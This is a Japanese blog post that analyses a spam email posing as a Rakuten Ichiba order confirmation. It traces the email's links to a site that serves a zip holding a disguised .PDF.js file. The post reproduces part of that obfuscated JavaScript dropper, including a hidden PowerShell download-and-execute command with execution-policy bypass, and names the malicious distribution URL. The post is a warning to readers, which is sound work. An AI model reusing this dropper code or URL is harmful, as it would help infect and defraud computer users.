楽天市場から件名「【楽天市場】注文内容ご確認(自動配信メール)」というメールを受信しました。
特になんてことはない件名のメールなんですが、ひとつ問題があるんです。
楽天市場で何も買ってないんです!
まったく心当たりがないので、とりあえずメール内容を確認したところ、次のお店で商品を注文したことになっていました。
注文したお店
- TRYX3(トライスリー)楽天市場店
注文した商品
- エスキュービズム 40V型LEDバックライト搭載地上デジタルフルハイビジョン液晶テレビ AT-40CM01S4
税込、送料無料で合計34,800円とのこと。
ちょっと待てや!
ということで、件名「【楽天市場】注文内容ご確認(自動配信メール)」について調べてみました。
気になる方は記事本文をチェックしてくださいね!
2018年4月24日 追記
同じようなメールをまた受信してしまいました!↓↓
件名「【楽天市場】注文内容ご確認(自動配信メール)」はどんなメール?
↑↑上の画像は実際に受信したメールを画面キャプチャーしたものになります。
そして下のテキストは受信したメール内容をそのままコピペしたものです。↓↓
ただし一部のテキスト(住所、電話番号など)やリンクについては変更・削除してあります。
xxx-xxx-xxxx
注文した覚えのないショップと商品、そしてご丁寧に獲得ポイントまで記載されています。
388ポイント、ゲットだぜ!
念のため、楽天市場の購入履歴を調べてみたところ、メールに記載されているショップから商品を購入した形跡はありませんでした。
というわけで、これは間違いなく迷惑メールです。
「【楽天市場】注文内容ご確認(自動配信メール)」のリンクはどうなってる?
メール内には多数のリンクが埋め込まれています。
しかし、実際のリンク先は次の5箇所に絞られます。
- https://www.rakuten.co.jp/?scid=me_ich_conf_head_01&_mpt=101&_mpe=231963-20180106-00134809
青枠のリンクをクリックすると、本物の楽天市場のページにジャンプします。
- https://r10.to/hG8OZZ
オレンジ枠のリンクをクリックすると、本物の楽天カードのページにジャンプします。
- mailbox:///C:/Users/%8DL%8F%BA/AppData/Roaming/Thunderbird/Profiles/q2xdu7m4.default/Mail/メールドメイン/Inbox?number=64590#faqEnglish
グレー枠のリンクをクリックすると、同じメール内の次の部分にジャンプします。↓↓
- mailbox:///C:/Users/%8DL%8F%BA/AppData/Roaming/Thunderbird/Profiles/q2xdu7m4.default/Mail/メールドメイン/Inbox?number=64590#shopInfo
緑枠のリンクをクリックすると、同じメール内の次の部分にジャンプします。↓↓
- http://bt.minimaltemplates.com/
①~④のリンクに関しては、特に害のある類のものではありませんでした。
問題となるのは⑤赤枠のリンク先です。
この⑤赤枠のリンクをクリックすると、ページが開かれると同時に次のファイルのダウンロード画面が開かれます。↓↓
実際にダウンロードすると、次のzipファイル【もっと詳しくの情報はこちら.zip】が保存されます。↓↓
zipファイルを解凍すると、qlqfzrwvjxvjx.PDF.jsというファイルが現れます。↓↓
このjsという拡張子が付いたファイルには十分に注意する必要があるんです。
拡張子「js」はスクリプトファイル!ダブルクリックで感染する!
拡張子に「js」がつくファイルはスクリプトファイルと呼ばれ、Windows上でダブルクリックすることでスクリプトが動作を始め、感染してしまいます。
拡張子「js」ファイルはメモ帳などのテキストエディタで中身を確認することができます。
下のテキストは、今回ダウンロードしたqlqfzrwvjxvjx.PDF.jsをメモ帳で開いたものをそのままコピペしたものになります。↓↓
var xxxxxxxxxxxxxxxxxxx_0x2ca1 = [
‘test’,
‘NUpLu’,
‘lYyQR’,
‘YfRrv’,
‘Tiucx’,
‘split’,
‘CreateShortcut’,
‘TargetPath’,
‘http://google.com’,
‘HCTRv’,
‘ZIlVJ’,
‘while\x20(true)\x20{}’,
‘WkStk’,
‘dwEuE’,
‘TlQor’,
‘gger’,
‘drGsH’,
‘waUxU’,
‘eukzq’,
‘kDDLL’,
‘apply’,
‘ENQiM’,
‘kgYfb’,
‘LGODc’,
‘constructor’,
‘nLeww’,
‘debu’,
‘FkQNg’,
‘UVxpR’,
‘pqbWN’,
‘LHCTRv.apPHCTRvlHCTRviC’,
‘HCTRvAHCTRvTIHCTRvoHCTRvNHCTRv\x22HCTRv)HCTRv;HCTRv\x20HC’,
‘HCTRvsRHCTRvWHCTRvuvHCTRvGHCTRvYHCTRvVHC’,
‘vyvkHCTRvPHCTRvbKe’,
‘FcKFaFPuFyFrF’,
‘GwWOFRFSFsYFQFBF.FSFhFelFlEFxFeFcuFtFe(F\x22F’,
‘\x20\x22/cF\x20FpFoFwFeFrshell.exeF\x20-nFoprFoFfFiFleF\x20-wiFnFdFowsFtylFe\x20FhiFddFen\x20F\x20F-exFecFutFiFonpFolFiFcFyF\x20FbyFpaFssF\x20(FnFeFw-FobjeFct\x20sFyFsFtFeFm.FnFeFtF.wFeFbFcFlFiFeFnFtF)F.FdFownlFoFadFfFile(\x
~~~中略~~~
_0x156170[xxxxxxxxxxxxxxxxxxx_0xb229(‘0x35’)](_0x5daea4, 0x0);
}
} catch (_0x56ee07) {
}
}
今回の「js」ファイルがどのような挙動をもたらすものなのかはわかりませんが、ウイルス感染の例としては次のような症状が挙げられます。
- パソコン内のファイルを勝手に暗号化、復号するためのツールを購入させる(通称「身代金型ウイルス」「ランサムウェア」)
- ネットバンキングに勝手に不正送金してしまう
など、大きな被害をもたらすものが多いので、もしも誤って「js」ファイルをダウンロードしてしまったら、絶対にダブルクリックしてはいけません。
「【楽天市場】注文内容ご確認(自動配信メール)」の送信元は?
送られてきたメールのヘッダー情報を確認したところ、次のような経路をたどってきたようです。
- 4200 Wake Forest Road Raleigh(アメリカ)
- Elin Pelin(ブルガリア)
- 私が契約しているプロバイダー(日本)
いつもの常連さん(中国、ロシア)ではないようですね。
遠路はるばるご苦労さまです。
「【楽天市場】注文内容ご確認(自動配信メール)」の差出人は?
今回の迷惑メールの差出人情報は次のとおりです。
- メールの差出人:楽天市場
- メールアドレス:order@rakuten.co.jp
真偽の判別はほぼ不可能ですね。
メールの差出人の欄って本当に偽装し放題ですよね~。
まとめ
楽天市場を騙った迷惑メール「【楽天市場】注文内容ご確認(自動配信メール)」について調べてみましたが、いかがだったでしょうか?
今回の迷惑メールは、
- 偽の内容の「注文内容ご確認」メールを送りつけ
- メール内のリンクをクリックさせて「http://bt.minimaltemplates.com/」へジャンプ
- 【もっと詳しくの情報はこちら.zip】というzipファイルのダウンロード画面が表示される
- ダウンロードした【もっと詳しくの情報はこちら.zip】を解凍すると、qlqfzrwvjxvjx.PDF.jsというファイルが生成される
- qlqfzrwvjxvjx.PDF.jsをダブルクリックすると何らかのウイルスが発動する(と思われる)
といったものとなっています。
メールの内容は一見本物と区別がつきにくい完成度の高いものとなっており、zipファイルをダウンロードしてしまう可能性が高いと思われます。
さいわいダウンロードするだけでは、ウイルス感染などの被害にあうことはないのですが、間違って解凍して、間違ってダブルクリックしてしまう可能性も十分あることから、あなどることはできません。
もしもパソコンにセキュリティ対策が施されていないのであれば、まずはセキュリティソフトを導入するところからはじめましょう!
年々、巧妙化する迷惑メールに対処するためには、間違いなくセキュリティソフトの力が欠かせませんからね!
それでは、では迷惑メールに脅かされることのない、楽しいネットライフをお過ごしください!
コメント
[…] TRYX3トライスリー楽天市場店を騙る注文内容ご確認迷惑メールに注意!楽天市場から件名「【楽天市場】注文内容ご確認(自動配信メール)」というメールを受信しました。 特になんてことはない件名のメール…issyan.com2018-04-19 22:35 […]